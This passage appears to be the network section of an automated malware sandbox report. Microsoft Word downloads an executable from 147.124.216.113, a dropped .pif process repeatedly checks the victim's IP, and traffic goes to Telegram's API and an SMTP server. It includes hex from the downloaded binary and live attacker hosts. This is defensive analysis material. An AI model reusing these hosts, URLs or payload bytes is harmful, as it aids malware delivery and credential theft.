Jan 16, 2025 08:26:26.190500021 CET	50062	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:27:42.723869085 CET	49989	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:27:42.728766918 CET	587	49989	46.151.208.21	192.168.2.5
Jan 16, 2025 08:27:42.984317064 CET	587	49989	46.151.208.21	192.168.2.5
Jan 16, 2025 08:27:42.988162041 CET	49989	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:27:48.425183058 CET	50060	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:27:48.430421114 CET	587	50060	46.151.208.21	192.168.2.5
Jan 16, 2025 08:27:48.688899994 CET	587	50060	46.151.208.21	192.168.2.5
Jan 16, 2025 08:27:48.689491034 CET	50060	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:27:55.644033909 CET	50062	587	192.168.2.5	46.151.208.21
Jan 16, 2025 08:27:55.649240017 CET	587	50062	46.151.208.21	192.168.2.5
Jan 16, 2025 08:27:55.905093908 CET	587	50062	46.151.208.21	192.168.2.5
Jan 16, 2025 08:27:55.905678034 CET	50062	587	192.168.2.5	46.151.208.21

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 16, 2025 08:25:24.126494884 CET	51509	53	192.168.2.5	1.1.1.1
Jan 16, 2025 08:25:24.140115976 CET	53	51509	1.1.1.1	192.168.2.5
Jan 16, 2025 08:25:32.935745955 CET	61723	53	192.168.2.5	1.1.1.1
Jan 16, 2025 08:25:32.942708015 CET	53	61723	1.1.1.1	192.168.2.5
Jan 16, 2025 08:25:34.365658998 CET	49610	53	192.168.2.5	1.1.1.1
Jan 16, 2025 08:25:34.372915983 CET	53	49610	1.1.1.1	192.168.2.5
Jan 16, 2025 08:25:47.297163963 CET	61893	53	192.168.2.5	1.1.1.1
Jan 16, 2025 08:25:47.303684950 CET	53	61893	1.1.1.1	192.168.2.5
Jan 16, 2025 08:25:55.827137947 CET	64917	53	192.168.2.5	1.1.1.1
Jan 16, 2025 08:25:56.410310030 CET	53	64917	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 16, 2025 08:25:24.126494884 CET	192.168.2.5	1.1.1.1	0x3c9b	Standard query (0)	amazonenviro.com	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:32.935745955 CET	192.168.2.5	1.1.1.1	0x165e	Standard query (0)	checkip.dyndns.org	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:34.365658998 CET	192.168.2.5	1.1.1.1	0x30cc	Standard query (0)	reallyfreegeoip.org	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:47.297163963 CET	192.168.2.5	1.1.1.1	0x5ec2	Standard query (0)	api.telegram.org	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:55.827137947 CET	192.168.2.5	1.1.1.1	0x41df	Standard query (0)	mail.irco.com.sa	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 16, 2025 08:25:24.140115976 CET	1.1.1.1	192.168.2.5	0x3c9b	No error (0)	amazonenviro.com		166.62.27.188	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:32.942708015 CET	1.1.1.1	192.168.2.5	0x165e	No error (0)	checkip.dyndns.org	checkip.dyndns.com		CNAME (Canonical name)	IN (0x0001)	false
Jan 16, 2025 08:25:32.942708015 CET	1.1.1.1	192.168.2.5	0x165e	No error (0)	checkip.dyndns.com		132.226.247.73	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:32.942708015 CET	1.1.1.1	192.168.2.5	0x165e	No error (0)	checkip.dyndns.com		193.122.6.168	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:32.942708015 CET	1.1.1.1	192.168.2.5	0x165e	No error (0)	checkip.dyndns.com		193.122.130.0	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:32.942708015 CET	1.1.1.1	192.168.2.5	0x165e	No error (0)	checkip.dyndns.com		132.226.8.169	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:32.942708015 CET	1.1.1.1	192.168.2.5	0x165e	No error (0)	checkip.dyndns.com		158.101.44.242	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:34.372915983 CET	1.1.1.1	192.168.2.5	0x30cc	No error (0)	reallyfreegeoip.org		104.21.80.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:34.372915983 CET	1.1.1.1	192.168.2.5	0x30cc	No error (0)	reallyfreegeoip.org		104.21.112.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:34.372915983 CET	1.1.1.1	192.168.2.5	0x30cc	No error (0)	reallyfreegeoip.org		104.21.96.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:34.372915983 CET	1.1.1.1	192.168.2.5	0x30cc	No error (0)	reallyfreegeoip.org		104.21.64.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:34.372915983 CET	1.1.1.1	192.168.2.5	0x30cc	No error (0)	reallyfreegeoip.org		104.21.32.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:34.372915983 CET	1.1.1.1	192.168.2.5	0x30cc	No error (0)	reallyfreegeoip.org		104.21.48.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:34.372915983 CET	1.1.1.1	192.168.2.5	0x30cc	No error (0)	reallyfreegeoip.org		104.21.16.1	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:47.303684950 CET	1.1.1.1	192.168.2.5	0x5ec2	No error (0)	api.telegram.org		149.154.167.220	A (IP address)	IN (0x0001)	false
Jan 16, 2025 08:25:56.410310030 CET	1.1.1.1	192.168.2.5	0x41df	No error (0)	mail.irco.com.sa		46.151.208.21	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

amazonenviro.com

reallyfreegeoip.org

api.telegram.org

147.124.216.113

checkip.dyndns.org

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49711	147.124.216.113	80	1812	C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:21.954865932 CET	181	OUT	GET /albt.exe HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-ch User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: 147.124.216.113
Jan 16, 2025 08:25:22.478033066 CET	1236	IN	HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 16 Jan 2025 00:23:14 GMT Accept-Ranges: bytes ETag: "86a3fcd4ac67db1:0" Server: Microsoft-IIS/8.5 Date: Thu, 16 Jan 2025 13:05:50 GMT Content-Length: 854016 Data Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 19 5e 42 2a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 68 05 00 00 9c 07 00 00 00 00 00 54 77 05 00 00 10 00 00 00 80 05 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 90 [TRUNCATED] Data Ascii: MZP@!L!This program must be run under Win32$7PEL^B*hTw@@t$0^ .text_` `.itextpd `.datal@.bss6.idatat$&@.tls4.rdata @@.reloc^0`@B.rsrc@@@@
Jan 16, 2025 08:25:22.478096962 CET	224	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 40 00 03 07 42 6f 6f 6c 65 61 6e 01 00 00 00 00 01 00 00 00 00 10 40 00 05 46 61 6c 73 65 04 54 72 75 65 8d 40 00 2c 10 40 00 02 04 43 68 61 72 01 00 Data Ascii: @Boolean@FalseTrue@,@Char@@IntegerX@Bytel@Word@Cardinal@string@
Jan 16, 2025 08:25:22.478143930 CET	1236	IN	Data Raw: 40 00 04 00 00 00 00 00 00 00 64 3a 40 00 70 3a 40 00 74 3a 40 00 78 3a 40 00 6c 3a 40 00 cc 37 40 00 e8 37 40 00 24 38 40 00 07 54 4f 62 6a 65 63 74 f8 10 40 00 07 07 54 4f 62 6a 65 63 74 ec 10 40 00 00 00 00 00 00 00 06 53 79 73 74 65 6d 00 00 Data Ascii: @d:@p:@t:@x:@l:@7@7@$8@TObject@TObject@System@IInterfaceFSystemD$!MD$?MD$IME@O@Y@Fe@@@q@
Jan 16, 2025 08:25:22.478199959 CET	1236	IN	Data Raw: 0c d5 a4 a7 45 00 8b 51 04 39 ca 89 08 89 50 04 89 02 89 41 04 74 03 c3 90 90 81 e9 a4 a7 45 00 89 ca c1 e9 03 0f b6 d6 b8 01 00 00 00 d3 e0 09 04 95 24 a7 45 00 b8 01 00 00 00 89 d1 d3 e0 09 05 20 a7 45 00 c3 83 3d 1c a7 45 00 00 75 03 c3 90 90 Data Ascii: EQ9PAtE$E E=EuE@u%HE)JHT0g#P0rE#PE)SjhhjtMEEEQ
Jan 16, 2025 08:25:22.478235960 CET	1236	IN	Data Raw: 89 0d 1c a7 45 00 83 cb 02 89 58 fc eb 07 89 d8 e8 c9 fb ff ff c6 05 14 a7 45 00 00 5b c3 56 57 8d 3c cd a4 a7 45 00 8b 77 04 8b 46 04 89 47 04 89 38 39 c7 75 17 b8 fe ff ff ff d3 c0 21 04 95 24 a7 45 00 75 07 0f b3 15 20 a7 45 00 bf f0 ff ff ff Data Ascii: EXE[VW<EwFG89u!$Eu E#~)t3JHT0rd7KNE_^[[1PSIEuajBt,J@At1[KZJQS1[t
Jan 16, 2025 08:25:22.478272915 CET	672	IN	Data Raw: ff 83 c0 30 8d 55 04 29 c2 77 0b 83 24 2e f7 83 c5 04 eb 1e 90 90 89 54 2e fc 8d 7a 03 89 7c 30 fc 89 c5 81 fa 30 0b 00 00 72 07 01 f0 e8 0c f6 ff ff 09 dd 89 6e fc c6 05 14 a7 45 00 00 89 f0 5d 5f 5e 5b c3 90 90 c6 05 14 a7 45 00 00 89 c8 c1 e8 Data Ascii: 0U)w$.T.z\|00rnE]_^[E1)!RZt,vP+<]_^[9vD1)!RZt",vPN^[9rP
Jan 16, 2025 08:25:22.517112970 CET	1236	IN	Data Raw: ff c1 e8 18 81 e2 ff ff ff 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 17 81 e2 ff ff 7f 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 83 df ff c1 e8 16 81 e2 ff ff 3f 00 09 c1 83 c8 30 88 07 8d 04 92 8d 14 92 83 f9 01 Data Ascii: 00?000G_@SV^[USVE@;rMMA;sjEPP"}<E@UB;v'E
Jan 16, 2025 08:25:22.517184973 CET	1236	IN	Data Raw: ff 00 8b 73 0c 83 e6 f0 83 ee 04 83 ee 10 8b 85 f8 47 fe ff 89 b4 85 d8 07 fe ff ff 85 f8 47 fe ff 8b 5b 04 81 fb a8 c7 45 00 74 0c 81 bd f8 47 fe ff 00 10 00 00 7c b5 80 bd ff 47 fe ff 00 0f 85 58 02 00 00 c6 85 f7 47 fe ff 00 33 c0 89 85 e8 47 Data Ascii: sGG[EtG\|GXG3GX)@(AG7G>EOGGGGG;>Gu)@'GGu
Jan 16, 2025 08:25:22.517221928 CET	1236	IN	Data Raw: c7 45 00 5f 5e 5b c3 8d 40 00 53 56 57 55 bb 04 a7 45 00 be a8 c7 45 00 8b 7b 04 eb 12 8b 6f 04 68 00 80 00 00 6a 00 57 e8 85 e7 ff ff 8b fd 3b fb 75 ea ba 37 00 00 00 b8 3c 80 45 00 8b c8 89 48 14 8b c8 89 48 04 c7 40 08 01 00 00 00 33 c9 89 48 Data Ascii: E_^[@SVWUEE{ohjW;u7<EHH@3H Ju[E@Ju^{hjS(;u6v]_^[=EtEP3E=Etc=EthjEP3E @t
Jan 16, 2025 08:25:22.517271042 CET	1236	IN	Data Raw: 00 00 e8 a7 fd ff ff 8b c6 5e 5b c3 8b c0 53 0f b6 1a 3a cb 76 02 8b cb 88 08 42 40 0f b6 c9 92 e8 fd fd ff ff 5b c3 8d 40 00 53 56 57 89 c6 89 d7 31 c0 31 d2 8a 06 8a 17 46 47 29 d0 77 02 01 c2 52 c1 ea 02 74 26 8b 0e 8b 1f 39 d9 75 44 4a 74 15 Data Ascii: ^[S:vB@[@SVW11FG)wRt&9uDJtN_9u7JuZt:u/JtN:Ou$JtN:OuZ8u8u8u8_^[SVQt&9uENtHZ9u8Nu^t6:u0NtH:J
Jan 16, 2025 08:25:22.517306089 CET	1236	IN	Data Raw: ef 3d 41 e0 8c e9 80 c9 47 ba 93 a8 41 aa 17 e6 7f 2b a1 16 b6 12 42 6b 55 27 39 8d f7 70 e0 7c 42 30 c9 3c e3 ff 96 52 8a e7 42 8e de f9 9d fb eb 7e aa 51 43 8c 2f 6a 5c 19 fc 26 d2 bb 43 76 e3 cc f2 29 2f 84 81 26 44 d2 0a 90 db 00 27 a4 9f 90 Data Ascii: =AGA+BkU'9p\|B0<RB~QC/j\&Cv)/&D'DDYdEJzEb>9FFuuvHM9;5S]=];Z T7aZ%]g']n R`%uYnb5{%ES3juj

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49758	132.226.247.73	80	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:32.956012011 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:33.648559093 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 08:25:33.653177023 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:33.865679979 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:33 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 08:25:35.070605993 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:35.283335924 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:35 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49785	132.226.247.73	80	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:35.904366970 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:37.575536013 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:37 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49796	132.226.247.73	80	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:38.175128937 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:38.865207911 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:38 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49807	132.226.247.73	80	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:39.500993967 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:40.193797112 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:40 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49820	132.226.247.73	80	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:40.846149921 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:41.528443098 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:41 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49833	132.226.247.73	80	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:42.202163935 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:42.874547958 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:42 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49840	132.226.247.73	80	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:43.556695938 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:44.239105940 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:44 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49847	132.226.247.73	80	7716	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:44.910378933 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:46.598145008 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:46 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49863	132.226.247.73	80	8008	C:\Users\Public\Libraries\npratlsN.pif

Timestamp	Bytes transferred	Direction	Data
Jan 16, 2025 08:25:47.042229891 CET	151	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org Connection: Keep-Alive
Jan 16, 2025 08:25:47.715920925 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 08:25:47.735799074 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:47.944468021 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:47 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 16, 2025 08:25:49.032938004 CET	127	OUT	GET / HTTP/1.1 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) Host: checkip.dyndns.org
Jan 16, 2025 08:25:49.245121956 CET	273	IN	HTTP/1.1 200 OK Date: Thu, 16 Jan 2025 07:25:49 GMT Content-Type: text/html Content-Length: 104 Connection: keep-alive Cache-Control: no-cache Pragma: no-cache Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>

